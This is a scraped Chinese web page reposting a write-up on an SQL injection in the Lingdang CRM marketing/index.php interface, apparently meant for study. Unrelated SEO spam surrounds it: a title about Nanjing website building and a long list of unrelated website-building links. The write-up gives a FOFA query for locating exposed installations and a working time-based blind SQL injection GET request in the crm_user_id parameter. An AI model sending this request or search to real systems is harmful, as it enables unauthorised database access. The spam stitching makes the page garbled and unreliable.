当前位置: 首页 > news >正文

南京网站制作哪家专业在线crm软件系统

南京网站制作哪家专业,在线crm软件系统,十大装饰公司,详情页模板下载文章目录 灵当CRM index.php接口SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 灵当CRM index.php接口SQL注入漏洞复现 [附POC] 0x01 前言 免责声明:请勿利用文章内的相关技…

文章目录

  • 灵当CRM index.php接口SQL注入漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

灵当CRM index.php接口SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系。灵当CRM marketing/index.php接口存在SQL注入漏洞。

0x03 影响版本

灵当CRM

0x04 漏洞环境

FOFA语法: body=“ldcrm.base.js” && icon_hash=“436310201”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

3.复现

在这里插入图片描述

0x06 修复建议

建议关闭互联网暴露面或接口设置访问权限;升级至安全版本

http://www.yayakq.cn/news/190025/

相关文章:

  • 外贸购物网站建设wordpress order插件
  • 论网站建设技术的作者是谁你做网站群好朋友的作文
  • 企业营销推广型网站建设牙科医院网站源码
  • 在线销售型网站上海青浦网站建设公司
  • 一直能打开的网站突然打不开设计在线接单
  • wordpress闭站购物网站线下推广办法
  • 网站建设免费视频教程wordpress分享积分
  • 全网vip影视网站一键搭建网站建设设计文档模板下载
  • 服装毕业设计代做网站网站推广的表现方式
  • wordpress js插件开发教程长沙百家号seo
  • 国外网站专题红黄wordpress 更改字体
  • 杭州网站怎么制作做关于什么的网站
  • 用ps做网站得多大像素网站建设与维护中
  • 住房及城乡建设部信息中心网站公司网站建设费用的会计分录
  • 无锡网站建设哪家公司好深圳做公司网站的公司
  • 厦门建设管理局网站阜阳网站建设电话
  • dedecms 安防监控行业网站模板厦门网站开发培训
  • 教育网网站建设规范蛋糕店网页设计免费模板
  • 点击图片是网站怎么做的凡科建站官网怎么样
  • 网站开发的特点网站后台关键词
  • 英国网站建设家庭网站建设
  • 网站建设公司业务在哪里来网站建设分项报价表
  • 做网站网wordpress禁用客户端登录
  • 如何提网站建设需求搞个app要多少钱
  • 做网站要学什么语言北京高端定制网站建设
  • 江苏网站建设教程广告公司活动策划公司
  • 大连图书馆网站建设要求wordpress数据库加密方式
  • 做seo用什么网站系统35互联做网站多少钱
  • wordpress 页面 404南京seo排名
  • 建站开始的前6个月多少外链最合适个人网站有什么用